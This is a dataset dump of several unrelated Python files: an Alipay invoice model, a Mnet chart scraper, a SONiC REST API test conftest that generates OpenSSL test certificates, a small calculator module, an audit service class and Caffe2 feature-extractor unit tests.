] | permissive | hipacloud/alipay-sdk-python-all | e4aec2869bf1ea6f7c6fb97ac7cc724be44ecd13 | bdbffbc6d5c7a0a3dd9db69c99443f98aecf907d | refs/heads/master | 2022-11-14T11:12:24.441822 | 2020-07-14T03:12:15 | 2020-07-14T03:12:15 | 277,970,730 | 0 | 0 | Apache-2.0 | 2020-07-08T02:33:15 | 2020-07-08T02:33:14 | null | UTF-8 | Python | false | false | 18,343 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.InvoiceItemQueryOpenModel import InvoiceItemQueryOpenModel
from alipay.aop.api.domain.InvoiceTitleQueryOpenModel import InvoiceTitleQueryOpenModel
class InvoiceQueryOpenModel(object):
    """Response model describing one invoice in the Alipay open API.

    The original generated code repeated identical property /
    dict-conversion boilerplate for each of the 32 fields; this version
    drives the same behavior from a single field list while keeping the
    public interface (property names, ``to_alipay_dict`` and
    ``from_alipay_dict``) unchanged.
    """

    # All serializable fields, in the order the generated code declared them.
    _ALL_FIELDS = (
        'apply_from', 'check_code', 'checker', 'clerk', 'einv_code',
        'einv_no', 'ex_tax_amount', 'invoice_amount', 'invoice_content',
        'invoice_date', 'invoice_id', 'invoice_kind', 'invoice_memo',
        'invoice_title', 'invoice_type', 'm_short_name', 'ori_blue_inv_code',
        'ori_blue_inv_no', 'out_apply_id', 'out_trade_no', 'payee',
        'payee_address', 'payee_bank_account', 'payee_bank_name',
        'payee_register_name', 'payee_register_no', 'payee_tel',
        'preview_image_url', 'sub_m_short_name', 'sum_tax_amount',
        'trade_date', 'user_id',
    )
    # Fields whose setters perform no model conversion.
    _SIMPLE_FIELDS = tuple(f for f in _ALL_FIELDS
                           if f not in ('invoice_content', 'invoice_title'))

    def __init__(self):
        # Every field starts as None in its backing ``_<name>`` slot.
        for field_name in self._ALL_FIELDS:
            setattr(self, '_' + field_name, None)

    @property
    def invoice_content(self):
        return self._invoice_content

    @invoice_content.setter
    def invoice_content(self, value):
        # Accepts a list of InvoiceItemQueryOpenModel instances or plain
        # dicts; dicts are converted to models. Non-list values are ignored,
        # matching the generated code.
        if isinstance(value, list):
            self._invoice_content = list()
            for i in value:
                if isinstance(i, InvoiceItemQueryOpenModel):
                    self._invoice_content.append(i)
                else:
                    self._invoice_content.append(
                        InvoiceItemQueryOpenModel.from_alipay_dict(i))

    @property
    def invoice_title(self):
        return self._invoice_title

    @invoice_title.setter
    def invoice_title(self, value):
        # Accepts either a ready model instance or a dict to convert.
        if isinstance(value, InvoiceTitleQueryOpenModel):
            self._invoice_title = value
        else:
            self._invoice_title = InvoiceTitleQueryOpenModel.from_alipay_dict(value)

    def to_alipay_dict(self):
        """Serializes the model to a plain dict.

        Falsy fields are omitted; nested models are serialized via their
        own ``to_alipay_dict``. Note: like the generated code, the
        elements of ``invoice_content`` are converted in place.

        Returns:
            dict mapping field name to serialized value.
        """
        params = dict()
        for field_name in self._ALL_FIELDS:
            value = getattr(self, field_name)
            if not value:
                continue
            if field_name == 'invoice_content' and isinstance(value, list):
                # Convert list elements in place (mirrors the original,
                # which mutated self.invoice_content while serializing).
                for i in range(0, len(value)):
                    element = value[i]
                    if hasattr(element, 'to_alipay_dict'):
                        value[i] = element.to_alipay_dict()
            if hasattr(value, 'to_alipay_dict'):
                params[field_name] = value.to_alipay_dict()
            else:
                params[field_name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Builds a model from a plain dict.

        Args:
            d: dict of field values (may be None/empty).

        Returns:
            A populated InvoiceQueryOpenModel, or None when ``d`` is falsy.
        """
        if not d:
            return None
        o = InvoiceQueryOpenModel()
        for field_name in InvoiceQueryOpenModel._ALL_FIELDS:
            if field_name in d:
                # Assign through the property so converting setters apply.
                setattr(o, field_name, d[field_name])
        return o


def _invoice_query_simple_property(field_name):
    """Builds a plain pass-through property for *field_name*."""
    attr = '_' + field_name

    def _get(self):
        return getattr(self, attr)

    def _set(self, value):
        setattr(self, attr, value)

    return property(_get, _set)


# Install the pass-through properties for every non-converting field.
for _field in InvoiceQueryOpenModel._SIMPLE_FIELDS:
    setattr(InvoiceQueryOpenModel, _field,
            _invoice_query_simple_property(_field))
del _field
| [
"[email protected]"
] | |
c3538eb3371b01aba72df474025a27cb07554102 | bb160d2fc2c6182c4ca56c8e4635a14215f8c70f | /test_module/collector_test.py | d89697bcb6a78e55d06285541f3c33103c1160c4 | [] | no_license | bitacademy-howl/Music_Recommendation_mod | 9464ed941ff722123457ba18cf35bccee3640b9b | 94a430df1c65dc4b930f46ade4576bff95b6c27e | refs/heads/master | 2020-03-27T15:18:21.725593 | 2018-11-05T08:55:45 | 2018-11-05T08:55:45 | 146,709,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,630 | py | import datetime
import time
from bs4 import BeautifulSoup
import modules.collection.crawler as cw
from db_accessing import *
from db_accessing.VO import Music_VO, Artist_VO, Album_VO
from modules.collection.urlMaker import UrlMaker
class Collector:
    def crawling_mnet_month_chart(url):
        """Scrape one page of the Mnet monthly chart at *url* and upsert rows.

        For each chart entry, fills an Artist_VO / Album_VO / Music_VO and
        merges each into the DB with an individual commit.

        NOTE(review): declared without ``self`` — invoke through the class,
        e.g. ``Collector.crawling_mnet_month_chart(url)`` (as
        ``collecting_chart`` does).
        """
        # Scraping song data from the Mnet monthly chart.
        # VO objects are reused across all rows of the page.
        artistVO = Artist_VO()
        albumVO = Album_VO()
        musicVO = Music_VO()
        html = cw.crawling(url=url)
        bs = BeautifulSoup(html, 'html.parser')
        #####################################################################################################################
        # Fill in the VO values from the chart table markup.
        tag_music_list = bs.find('div', attrs={'class': 'MMLTable jQMMLTable'})
        tag_tbody = tag_music_list.find('tbody')
        tags_tr = tag_tbody.findAll('tr')
        print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
        for tag_tr in tags_tr:
            # Data nested inside the item-title cell.
            item_title_tag_td = tag_tr.find('td', attrs={'class': 'MMLItemTitle'})
            # The unique id of the track comes from the row checkbox.
            musicVO.Music_ID = tag_tr.find('td', attrs={'class': 'MMLItemCheck'}).find('input')["value"]
            musicVO.Music_Title = item_title_tag_td.find('a', attrs={'class': 'MMLI_Song'}).get_text()
            album_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Album'})
            artist_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Artist'})
            print(album_tag)
            print(artist_tag)
            if album_tag != None:
                albumVO.Album_Title = album_tag.get_text()
                albumVO.Album_Node = album_tag["href"].strip(" ")
                # Numeric album id is the last path component of the href.
                albumVO.Album_ID = int(albumVO.Album_Node.rsplit('/', 1)[1])
                musicVO.Album_ID = albumVO.Album_ID
            if artist_tag != None:
                artistVO.Artist_Name = artist_tag.get_text()
                # Keep the node (href) on the object and in the table as well.
                artistVO.Artist_Node = artist_tag["href"].strip(" ")
                artistVO.Artist_ID = int(artistVO.Artist_Node.rsplit('/', 1)[1])
                albumVO.Singer_ID = artistVO.Artist_ID
            # NOTE(review): commits once per merge; check whether a single
            # commit per page (or ORM relationship cascades) would suffice.
            db_session.merge(artistVO)
            db_session.commit()
            db_session.merge(albumVO)
            db_session.commit()
            db_session.merge(musicVO)
            db_session.commit()
    def crawling_track(url):
        """Scrape a single track detail page at *url* into VO objects.

        NOTE(review): declared without ``self`` — invoke through the class.
        NOTE(review): nothing is merged/committed here and ``attrs`` is
        collected but never used, so this method looks unfinished — the
        parsed VOs are discarded when it returns. Confirm intent.
        """
        # VO objects that receive the parsed values.
        musicVO = Music_VO()
        albumVO = Album_VO()
        artistVO = Artist_VO()
        # Music_ID should be filled in from the link by the caller!
        # Music_VO.Music_ID =
        # bs from html response....
        html = cw.crawling(url=url)
        bs = BeautifulSoup(html, 'html.parser')
        tag_music_info = bs.find('div', attrs={'class': 'music_info_view'})
        # The track-summary table.
        summary = tag_music_info.find('div', attrs={'class': 'music_info_cont'})
        album_tag = summary.find('tbody').find('a')
        if album_tag is not None:
            albumVO.Album_Node = album_tag['href'].strip(" ")
            # Numeric album id is the last path component of the href.
            albumVO.Album_ID = albumVO.Album_Node.rsplit('/', 1)[1]
            musicVO.Album_ID = albumVO.Album_ID
        artist_tag = bs.find('span', attrs={'class': 'artist_txt'}).find('a')
        if artist_tag != None:
            artistVO.Artist_Node = artist_tag['href'].strip(" ")
            artistVO.Artist_ID = artistVO.Artist_Node.rsplit('/', 1)[1]
            artistVO.Artist_Name = artist_tag.get_text()
            albumVO.Singer_ID = artistVO.Artist_ID
        attrs = summary.find('li', attrs={'class': 'left_con'}).findAll('p', attrs={'class' : 'right'})
    def crawling_artist(id):
        """Scrape the Mnet artist page for artist *id* and upsert an Artist_VO.

        NOTE(review): declared without ``self`` — invoke through the class,
        e.g. ``Collector.crawling_artist(artist_id)``.
        """
        artistVO = Artist_VO()
        artistVO.Artist_ID = id
        artistVO.Artist_Node = '/artist/{0}'.format(id)
        artistVO.Group = False
        url = ''.join(['http://www.mnet.com', artistVO.Artist_Node])
        html = cw.crawling(url)
        bs = BeautifulSoup(html, 'html.parser')
        tag_artist_info = bs.find('div', attrs={'class': 'artist_info'})
        if tag_artist_info is not None:
            singer = tag_artist_info.find('a', attrs={'class': 'song_name'})
            if singer is not None:
                artistVO.Artist_Name = singer.get_text()
            else:
                # Fallback: take the name from the header block instead.
                artistVO.Artist_Name = tag_artist_info.find('li', attrs={'class': 'top_left'}).find(
                    'p').get_text().strip()
                print("############# strip 결과 #############\n", artistVO.Artist_Name,
                      "\n############# strip 결과 #############\n")
            a = tag_artist_info.find('div', attrs={'class': 'a_info_cont'})
            tags = tag_artist_info.findAll('span', attrs={'class': 'right'})
            for tag in tags:
                if tag is not None:
                    # Strip whitespace/markup artifacts, then split the
                    # "gender | group-type | ..." info line on '|'.
                    text_list = tag.get_text().strip().replace(' ', '').replace('\r', '').replace('\n', '').replace(
                        '\t', '').replace('\xa0', '').split('|')
                    print(text_list)
                    for text in text_list:
                        # '남성'/'여성'/'혼성' = male/female/mixed.
                        if text == '남성' or text == '여성' or text == '혼성':
                            artistVO.Gender = text
                        # '그룹' = group (as opposed to solo artist).
                        if text == '그룹':
                            artistVO.Group = True
        db_session.merge(artistVO)
        db_session.commit()
        time.sleep(0.5)  # Without the sleep we get blocked after ~200 requests...
        # ...by the site's firewall or IPS.
# 메인에서 호출할 함수들.....
def collecting_artist(self):
for id in range(1, 3000000, 1):
self.crawling_artist(id)
def collecting_track(self, node):
um = UrlMaker()
row_num_table = Music_VO.qurey.count()
for offs in range(0, row_num_table, 10):
result = Music_VO.query.limit(10).offset(offs).all()
for i in result:
self.crawling_track(um.direct_node_connect(i.Music_Node))
def collecting_chart(self):
um = UrlMaker()
for year in range(self.start_date.year, self.end_date.year+1):
for month in range(self.start_date.month, self.end_date.month+1):
try:
um.setDate(datetime.date(year, month, day=1))
um.url_maker_DATE_based()
for page_number in range(1, 3):
url = "".join([um.url_maker_DATE_based(), '?pNum=%d' % page_number])
print(url)
Collector.crawling_mnet_month_chart(url)
except ValueError:
break
# def __init__(self, start_date=datetime.date(2009, 1, 1), end_date=datetime.datetime.now().date()):
# # def __init__(self, start_date = datetime.date(2009, 1, 1), end_date = datetime.datetime.now().date()):
# self.start_date = start_date
# self.end_date = end_date
    def __init__(self):
        """Default the crawl window to 2009-08-01 .. today."""
        self.set_start_date()
        # End of the crawl window: today's date (local time).
        self.end_date = datetime.datetime.now().date()
def set_start_date(self, year = 2009, month = 8, day = 1):
self.start_date = datetime.date(2009, 8, 1)
def set_end_date(self, year, month, day):
self.end_date = datetime.date(year, month, day) | [
"[email protected]"
] | |
62ccef834d24c047c8d8308cd15dcbfcacd02062 | 49663ea34b41c8180d7484f778f5cad2e701d220 | /tests/restapi/conftest.py | 8915e5344b0b69e02c6d33ddb2f2045958be013b | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | stepanblyschak/sonic-mgmt | ed08c98e7bff1615b057daa8711686aa5986073d | a1ae1e0b4e9927e6f52916f76121780d19ec3e54 | refs/heads/master | 2023-04-07T01:30:11.403900 | 2023-03-29T10:16:52 | 2023-03-29T10:16:52 | 135,678,178 | 0 | 0 | NOASSERTION | 2023-03-29T16:13:55 | 2018-06-01T06:41:49 | Python | UTF-8 | Python | false | false | 4,694 | py | import logging
import pytest
import urllib3
from six.moves.urllib.parse import urlunparse
from tests.common import config_reload
from tests.common.helpers.assertions import pytest_require as pyrequire
from tests.common.helpers.dut_utils import check_container_state
from helper import apply_cert_config
RESTAPI_CONTAINER_NAME = 'restapi'
@pytest.fixture(scope="module", autouse=True)
def setup_restapi_server(duthosts, rand_one_dut_hostname, localhost):
'''
Create RESTAPI client certificates and copy the subject names to the config DB
'''
duthost = duthosts[rand_one_dut_hostname]
# Check if RESTAPI is enabled on the device
pyrequire(check_container_state(duthost, RESTAPI_CONTAINER_NAME, should_be_running=True),
"Test was not supported on devices which do not support RESTAPI!")
# Create Root key
local_command = "openssl genrsa -out restapiCA.key 2048"
localhost.shell(local_command)
# Create Root cert
local_command = "openssl req \
-x509 \
-new \
-nodes \
-key restapiCA.key \
-sha256 \
-days 1825 \
-subj '/CN=test.restapi.sonic' \
-out restapiCA.pem"
localhost.shell(local_command)
# Create server key
local_command = "openssl genrsa -out restapiserver.key 2048"
localhost.shell(local_command)
# Create server CSR
local_command = "openssl req \
-new \
-key restapiserver.key \
-subj '/CN=test.server.restapi.sonic' \
-out restapiserver.csr"
localhost.shell(local_command)
# Sign server certificate
local_command = "openssl x509 \
-req \
-in restapiserver.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiserver.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Create client key
local_command = "openssl genrsa -out restapiclient.key 2048"
localhost.shell(local_command)
# Create client CSR
local_command = "openssl req \
-new \
-key restapiclient.key \
-subj '/CN=test.client.restapi.sonic' \
-out restapiclient.csr"
localhost.shell(local_command)
# Sign client certificate
local_command = "openssl x509 \
-req \
-in restapiclient.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiclient.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Copy CA certificate and server certificate over to the DUT
duthost.copy(src='restapiCA.pem', dest='/etc/sonic/credentials/')
duthost.copy(src='restapiserver.crt', dest='/etc/sonic/credentials/testrestapiserver.crt')
duthost.copy(src='restapiserver.key', dest='/etc/sonic/credentials/testrestapiserver.key')
apply_cert_config(duthost)
urllib3.disable_warnings()
yield
# Perform a config load_minigraph to ensure config_db is not corrupted
config_reload(duthost, config_source='minigraph')
# Delete all created certs
local_command = "rm \
restapiCA.* \
restapiserver.* \
restapiclient.*"
localhost.shell(local_command)
@pytest.fixture
def construct_url(duthosts, rand_one_dut_hostname):
    """Fixture: return a helper that builds ``https://<dut_mgmt_ip>:8081<path>``.

    The returned ``get_endpoint(path)`` yields the full endpoint URL, or
    ``None`` if the URL could not be assembled.
    """
    def get_endpoint(path):
        duthost = duthosts[rand_one_dut_hostname]
        RESTAPI_PORT = "8081"
        netloc = duthost.mgmt_ip + ":" + RESTAPI_PORT
        try:
            tup = ('https', netloc, path, '', '', '')
            endpoint = urlunparse(tup)
        except Exception:
            # Bug fix: the old handler logged `endpoint`, which is unbound
            # when urlunparse raises, so the handler itself crashed with
            # UnboundLocalError. Log the inputs instead.
            logging.error("Invalid URL from netloc=%r path=%r", netloc, path)
            return None
        return endpoint
    return get_endpoint
@pytest.fixture
def vlan_members(duthosts, rand_one_dut_hostname, tbinfo):
    """Fixture: member-port list of the first minigraph VLAN, or [] if none."""
    duthost = duthosts[rand_one_dut_hostname]
    VLAN_INDEX = 0
    mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
    vlans = mg_facts["minigraph_vlans"]
    if vlans == {}:
        return []
    members = list(vlans.values())[VLAN_INDEX]["members"]
    return members if members is not None else []
| [
"[email protected]"
] | |
80954ebe7830dd8dfab25e0a013922bc01815edb | 160ff0dbe7f9e5d740faa3ce13302190e1e5f1f0 | /Calc.py | db893a216b2d9cc553077be5697b83b7af2224fd | [] | no_license | sivatoms/PyReddy | 9a84e1568e9ee6c16c2b51ba6044059d31ae62dd | fcc0ab8705d409c6b609f9b5f5cffb8900dd8eb7 | refs/heads/master | 2021-06-26T17:42:43.104598 | 2021-01-20T21:40:06 | 2021-01-20T21:40:06 | 197,511,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py |
from Demo import wish
def add(a, b):
    """Print and return the sum a + b (return added, backward-compatible)."""
    result = a + b
    print(result)
    return result


def sub(a, b):
    """Print and return the difference a - b."""
    result = a - b
    print(result)
    return result


def mul(a, b):
    """Print and return the product a * b."""
    result = a * b
    print(result)
    return result


def div(a, b):
    """Print and return the quotient a / b.

    Raises ZeroDivisionError when b == 0, as before.
    """
    result = a / b
    print(result)
    return result
wish()
print("This is second modules") | [
"[email protected]"
] | |
03ff54224dfdb710b2127f90b62adc825688daf5 | 419637376e445ec9faf04c877d5fb6c09d15903f | /steam/admin/activity/productAuditService.py | ec92efa0a2a88750d9fbbdda4e0b8a68c42dbce8 | [] | no_license | litaojun/steamOmTest | e4203df30acafaa5e282631d77429c0e4483fb88 | 86f84dbd802d947198823e02c2f1ba2695418a76 | refs/heads/master | 2020-04-02T21:48:55.115389 | 2019-07-11T06:08:27 | 2019-07-11T06:08:27 | 154,812,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | from steam.util.httpUopService import HttpUopService
from opg.bak.uopService import decorator
class ProductAuditService(HttpUopService):
    '''
    Audit an activity (i.e. review/approve a promotional activity).
    '''
    def __init__(self, kwargs):
        # kwargs: dict of SQL substitution values forwarded to the base
        # service; module/filename are intentionally left empty here.
        super(ProductAuditService, self).__init__(module = "",
                                                  filename = "",
                                                  sqlvaluedict = kwargs )
    # Decorated with the "setupAuditActivity" step; the decorator's exact
    # semantics live in opg.bak.uopService — TODO(review): confirm.
    @decorator(["setupAuditActivity"])
    def optAuditActivity(self):
        # Fire the HTTP request that performs the audit operation.
        self.sendHttpReq()
"[email protected]"
] | |
a0b916ba59d2287f975c8dd6cacb536734ae2464 | 02a39e3492b37e612a7076fe35bc2c2a08e3426e | /ml/rl/test/preprocessing/test_feature_extractor.py | aa4c899cec483d6904b1c6ba26e6301559e6b45d | [
"BSD-3-Clause"
] | permissive | xuegangwu2016/Horizon | a0fd11c3bd3c763a07d113fbc6fd51d50a15252d | a7633d8375240b757b34645a1fbebb809d2eabf2 | refs/heads/master | 2020-04-10T08:11:56.004183 | 2018-12-07T06:40:34 | 2018-12-07T06:43:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,018 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import unittest
import numpy as np
import numpy.testing as npt
from caffe2.python import schema, workspace
from ml.rl import types as rlt
from ml.rl.preprocessing.feature_extractor import (
PredictorFeatureExtractor,
TrainingFeatureExtractor,
map_schema,
)
from ml.rl.preprocessing.identify_types import CONTINUOUS, PROBABILITY
from ml.rl.preprocessing.normalization import MISSING_VALUE, NormalizationParameters
from ml.rl.test.utils import NumpyFeatureProcessor
class FeatureExtractorTestBase(unittest.TestCase):
    """Shared fixtures for feature-extractor tests.

    Provides normalization parameters, helpers that feed sparse
    (lengths/keys/values) Caffe2 blobs into a workspace, and the dense
    matrices (padded with MISSING_VALUE) that the extractors are expected
    to produce from those blobs.
    """

    def get_state_normalization_parameters(self):
        # State features 1..4: odd ids are PROBABILITY, even ids CONTINUOUS.
        return {
            i: NormalizationParameters(
                feature_type=PROBABILITY if i % 2 else CONTINUOUS, mean=0, stddev=1
            )
            for i in range(1, 5)
        }

    def get_action_normalization_parameters(self):
        # Sorted order: 12, 11, 13
        return {
            i: NormalizationParameters(
                feature_type=CONTINUOUS if i % 2 else PROBABILITY, mean=0, stddev=1
            )
            for i in range(11, 14)
        }

    def setup_state_features(self, ws, field):
        # Three examples with 3, 0 and 5 sparse features respectively.
        lengths = np.array([3, 0, 5], dtype=np.int32)
        keys = np.array([2, 1, 9, 1, 2, 3, 4, 5], dtype=np.int64)
        values = np.arange(8).astype(np.float32)
        ws.feed_blob(str(field.lengths()), lengths)
        ws.feed_blob(str(field.keys()), keys)
        ws.feed_blob(str(field.values()), values)
        return lengths, keys, values

    def expected_state_features(self, normalize):
        # Feature order: 1, 3, 2, 4
        dense = np.array(
            [
                [1, MISSING_VALUE, 0, MISSING_VALUE],
                [MISSING_VALUE, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
                [3, 5, 4, 6],
            ],
            dtype=np.float32,
        )
        if normalize:
            dense = NumpyFeatureProcessor.preprocess_array(
                dense, [1, 3, 2, 4], self.get_state_normalization_parameters()
            )
        return dense

    def setup_next_state_features(self, ws, field):
        lengths = np.array([2, 2, 4], dtype=np.int32)
        keys = np.array([2, 1, 9, 1, 2, 3, 4, 5], dtype=np.int64)
        values = np.arange(10, 18).astype(np.float32)
        ws.feed_blob(str(field.lengths()), lengths)
        ws.feed_blob(str(field.keys()), keys)
        ws.feed_blob(str(field.values()), values)
        return lengths, keys, values

    def expected_next_state_features(self, normalize):
        # Feature order: 1, 3, 2, 4
        dense = np.array(
            [
                [11, MISSING_VALUE, 10, MISSING_VALUE],
                [13, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
                [MISSING_VALUE, 15, 14, 16],
            ],
            dtype=np.float32,
        )
        if normalize:
            dense = NumpyFeatureProcessor.preprocess_array(
                dense, [1, 3, 2, 4], self.get_state_normalization_parameters()
            )
        return dense

    def expected_tiled_next_state_features(self, normalize):
        # NOTE: this depends on lengths of possible next action
        # Feature order: 1, 3, 2, 4
        dense = np.array(
            [
                [11, MISSING_VALUE, 10, MISSING_VALUE],
                [13, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
                [13, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
            ],
            dtype=np.float32,
        )
        if normalize:
            dense = NumpyFeatureProcessor.preprocess_array(
                dense, [1, 3, 2, 4], self.get_state_normalization_parameters()
            )
        return dense

    def setup_action(self, ws, field):
        # Discrete action ids, one per example.
        action = np.array([3, 2, 1], dtype=np.int64)
        ws.feed_blob(str(field()), action)
        return action

    def setup_next_action(self, ws, field):
        action = np.array([1, 2, 3], dtype=np.int64)
        ws.feed_blob(str(field()), action)
        return action

    def setup_possible_next_actions(self, ws, field):
        # Ragged list: example 0 has 1 candidate, example 1 has 2, example 2 none.
        lengths = np.array([1, 2, 0], dtype=np.int32)
        actions = np.array([3, 2, 1], dtype=np.int64)
        ws.feed_blob(str(field["lengths"]()), lengths)
        ws.feed_blob(str(field["values"]()), actions)
        return lengths, actions

    def setup_action_features(self, ws, field):
        lengths = np.array([2, 4, 2], dtype=np.int32)
        keys = np.array([11, 12, 14, 11, 12, 13, 13, 12], dtype=np.int64)
        values = np.arange(20, 28).astype(np.float32)
        ws.feed_blob(str(field.lengths()), lengths)
        ws.feed_blob(str(field.keys()), keys)
        ws.feed_blob(str(field.values()), values)
        return lengths, keys, values

    def expected_action_features(self, normalize):
        # Feature order: 12, 11, 13
        dense = np.array(
            [[21, 20, MISSING_VALUE], [24, 23, 25], [27, MISSING_VALUE, 26]],
            dtype=np.float32,
        )
        if normalize:
            dense = NumpyFeatureProcessor.preprocess_array(
                dense, [12, 11, 13], self.get_action_normalization_parameters()
            )
        return dense

    def setup_next_action_features(self, ws, field):
        lengths = np.array([4, 2, 2], dtype=np.int32)
        keys = np.array([11, 12, 14, 13, 12, 13, 11, 13], dtype=np.int64)
        values = np.arange(30, 38).astype(np.float32)
        ws.feed_blob(str(field.lengths()), lengths)
        ws.feed_blob(str(field.keys()), keys)
        ws.feed_blob(str(field.values()), values)
        return lengths, keys, values

    def expected_next_action_features(self, normalize):
        # Feature order: 12, 11, 13
        dense = np.array(
            [[31, 30, 33], [34, MISSING_VALUE, 35], [MISSING_VALUE, 36, 37]],
            dtype=np.float32,
        )
        if normalize:
            dense = NumpyFeatureProcessor.preprocess_array(
                dense, [12, 11, 13], self.get_action_normalization_parameters()
            )
        return dense

    def setup_possible_next_actions_features(self, ws, field):
        # Ragged list-of-maps: outer lengths per example, inner lengths per action.
        lengths = np.array([1, 2, 0], dtype=np.int32)
        values_lengths = np.array([1, 2, 3], dtype=np.int32)
        keys = np.array([11, 12, 14, 11, 13, 12], dtype=np.int64)
        values = np.arange(40, 46).astype(np.float32)
        ws.feed_blob(str(field["lengths"]()), lengths)
        ws.feed_blob(str(field["values"].lengths()), values_lengths)
        ws.feed_blob(str(field["values"].keys()), keys)
        ws.feed_blob(str(field["values"].values()), values)
        return lengths, values_lengths, keys, values

    def expected_possible_next_actions_features(self, normalize):
        # Feature order: 12, 11, 13
        dense = np.array(
            [
                [MISSING_VALUE, 40, MISSING_VALUE],
                [41, MISSING_VALUE, MISSING_VALUE],
                [45, 43, 44],
            ],
            dtype=np.float32,
        )
        if normalize:
            dense = NumpyFeatureProcessor.preprocess_array(
                dense, [12, 11, 13], self.get_action_normalization_parameters()
            )
        return dense

    def setup_reward(self, ws, field):
        reward = np.array([0.5, 0.6, 0.7], dtype=np.float32)
        ws.feed_blob(str(field()), reward)
        return reward

    def create_ws_and_net(self, extractor):
        """Build the extractor's nets in a fresh workspace; run init_net once."""
        net, init_net = extractor.create_net()
        ws = workspace.Workspace()
        ws.create_net(init_net)
        ws.run(init_net)
        # Pre-create the input blobs so `net` can be instantiated before
        # the test feeds actual data into them.
        for b in net.input_record().field_blobs():
            ws.create_blob(str(b))
        ws.create_net(net)
        return ws, net

    def check_create_net_spec(
        self, extractor, expected_input_record, expected_output_record
    ):
        """Assert the extractor's net declares the expected input/output schema."""
        net, init_net = extractor.create_net()
        # First, check that all outputs of init_net are used in net
        for b in init_net.external_outputs:
            self.assertTrue(net.is_external_input(b))
        # Second, check that input and output records are set
        input_record = net.input_record()
        output_record = net.output_record()
        self.assertIsNotNone(input_record)
        self.assertIsNotNone(output_record)
        # Third, check that the fields match what is expected
        self.assertEqual(
            set(expected_input_record.field_names()), set(input_record.field_names())
        )
        self.assertEqual(
            set(expected_output_record.field_names()), set(output_record.field_names())
        )
class TestTrainingFeatureExtractor(FeatureExtractorTestBase):
    """Tests for TrainingFeatureExtractor.

    Covers the four extractor configurations — {max-Q, SARSA} x {discrete,
    parametric} actions — each with and without normalization, checking both
    the extracted tensors and the declared net schema.
    """

    def create_extra_input_record(self, net):
        # Training-only fields appended to the extractor's own input schema.
        return net.input_record() + schema.NewRecord(
            net,
            schema.Struct(
                ("reward", schema.Scalar()), ("action_probability", schema.Scalar())
            ),
        )

    def setup_extra_data(self, ws, input_record):
        extra_data = rlt.ExtraData(
            action_probability=np.array([0.11, 0.21, 0.13], dtype=np.float32)
        )
        ws.feed_blob(
            str(input_record.action_probability()), extra_data.action_probability
        )
        return extra_data

    def test_extract_max_q_discrete_action(self):
        self._test_extract_max_q_discrete_action(normalize=False)

    def test_extract_max_q_discrete_action_normalize(self):
        self._test_extract_max_q_discrete_action(normalize=True)

    def _test_extract_max_q_discrete_action(self, normalize):
        extractor = TrainingFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            max_q_learning=True,
            normalize=normalize,
        )
        # Setup
        ws, net = self.create_ws_and_net(extractor)
        input_record = self.create_extra_input_record(net)
        self.setup_state_features(ws, input_record.state_features)
        self.setup_next_state_features(ws, input_record.next_state_features)
        action = self.setup_action(ws, input_record.action)
        possible_next_actions = self.setup_possible_next_actions(
            ws, input_record.possible_next_actions
        )
        reward = self.setup_reward(ws, input_record.reward)
        extra_data = self.setup_extra_data(ws, input_record)
        # Run
        ws.run(net)
        res = extractor.extract(ws, input_record, net.output_record())
        o = res.training_input
        npt.assert_array_equal(reward.reshape(-1, 1), o.reward.numpy())
        npt.assert_array_equal(
            extra_data.action_probability.reshape(-1, 1),
            res.extras.action_probability.numpy(),
        )
        npt.assert_array_equal(action, o.action.numpy())
        npt.assert_array_equal(
            possible_next_actions[0], o.possible_next_actions.lengths.numpy()
        )
        npt.assert_array_equal(
            possible_next_actions[1], o.possible_next_actions.actions.numpy()
        )
        npt.assert_allclose(
            self.expected_state_features(normalize),
            o.state.float_features.numpy(),
            rtol=1e-6,
        )
        npt.assert_allclose(
            self.expected_next_state_features(normalize),
            o.next_state.float_features.numpy(),
            rtol=1e-6,
        )

    def test_extract_sarsa_discrete_action(self):
        self._test_extract_sarsa_discrete_action(normalize=False)

    def test_extract_sarsa_discrete_action_normalize(self):
        self._test_extract_sarsa_discrete_action(normalize=True)

    def _test_extract_sarsa_discrete_action(self, normalize):
        extractor = TrainingFeatureExtractor(
            state_normalization_parameters=self.get_state_normalization_parameters(),
            max_q_learning=False,
            normalize=normalize,
        )
        # Setup
        ws, net = self.create_ws_and_net(extractor)
        input_record = self.create_extra_input_record(net)
        self.setup_state_features(ws, input_record.state_features)
        self.setup_next_state_features(ws, input_record.next_state_features)
        action = self.setup_action(ws, input_record.action)
        next_action = self.setup_next_action(ws, input_record.next_action)
        reward = self.setup_reward(ws, input_record.reward)
        extra_data = self.setup_extra_data(ws, input_record)
        # Run
        ws.run(net)
        res = extractor.extract(ws, input_record, net.output_record())
        o = res.training_input
        npt.assert_array_equal(reward.reshape(-1, 1), o.reward.numpy())
        npt.assert_array_equal(
            extra_data.action_probability.reshape(-1, 1),
            res.extras.action_probability.numpy(),
        )
        npt.assert_array_equal(action, o.action.numpy())
        npt.assert_array_equal(next_action, o.next_action.numpy())
        npt.assert_allclose(
            self.expected_state_features(normalize),
            o.state.float_features.numpy(),
            rtol=1e-6,
        )
        npt.assert_allclose(
            self.expected_next_state_features(normalize),
            o.next_state.float_features.numpy(),
            rtol=1e-6,
